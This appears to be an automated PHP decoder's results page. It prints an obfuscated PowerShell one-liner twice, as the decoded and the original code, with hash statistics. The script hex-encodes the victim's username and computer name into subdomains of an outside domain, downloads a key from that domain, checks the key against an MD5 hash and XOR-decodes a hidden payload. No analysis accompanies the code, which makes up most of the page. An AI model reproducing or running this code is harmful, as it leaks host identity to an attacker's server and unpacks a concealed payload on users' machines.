Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

filter u{([Environment]::GetEnvironmentVariable("${_}ERname")|Format-Hex|select -Expand By..

Decoded Output download

<?  filter u{([Environment]::GetEnvironmentVariable("${_}ERname")|Format-Hex|select -Expand Bytes|%{"{0:x2}"-f $_})-join""};$k=(NEw-OBjEct neT.WEbcLient).("dow"+"nloa"+"dSt"+"ring")("http://{0}.{1}.{2}.9C4276FE.ocdeb3in.at-tech.xyz/unknown"-f(-join((97..122)|gEt-RAndOm -cOUnt 8|%{[cHar]$_})),("us"|u),("comput"|u));if([BitConverter]::ToString((NEw-OBjEct Security.Cryptography.MD5CryptoServiceProvider).ComputeHash((NEw-OBjEct Text.UTF8Encoding).GetBytes($k)))-eq"aaa0da11037972be6d647f2ef605404e"){@(51,56,115,117,33,41,97,114,59,16,1,96,114,103,47,53,1,111,39,41,7,111,4,114,119,115,0,12,67,81,110,5,59,82,5,1,61)|%{$i=0}{[char]($_ -bxor $k[$i%14]);$i++}} ?>

Did this file decode correctly?

Original Code

filter u{([Environment]::GetEnvironmentVariable("${_}ERname")|Format-Hex|select -Expand Bytes|%{"{0:x2}"-f $_})-join""};$k=(NEw-OBjEct neT.WEbcLient).("dow"+"nloa"+"dSt"+"ring")("http://{0}.{1}.{2}.9C4276FE.ocdeb3in.at-tech.xyz/unknown"-f(-join((97..122)|gEt-RAndOm -cOUnt 8|%{[cHar]$_})),("us"|u),("comput"|u));if([BitConverter]::ToString((NEw-OBjEct Security.Cryptography.MD5CryptoServiceProvider).ComputeHash((NEw-OBjEct Text.UTF8Encoding).GetBytes($k)))-eq"aaa0da11037972be6d647f2ef605404e"){@(51,56,115,117,33,41,97,114,59,16,1,96,114,103,47,53,1,111,39,41,7,111,4,114,119,115,0,12,67,81,110,5,59,82,5,1,61)|%{$i=0}{[char]($_ -bxor $k[$i%14]);$i++}}

Function Calls

None

Variables

None

Stats

MD5 26a0bd38a3bb1a725d53383b8cfb3274
Eval Count 0
Decode Time 75 ms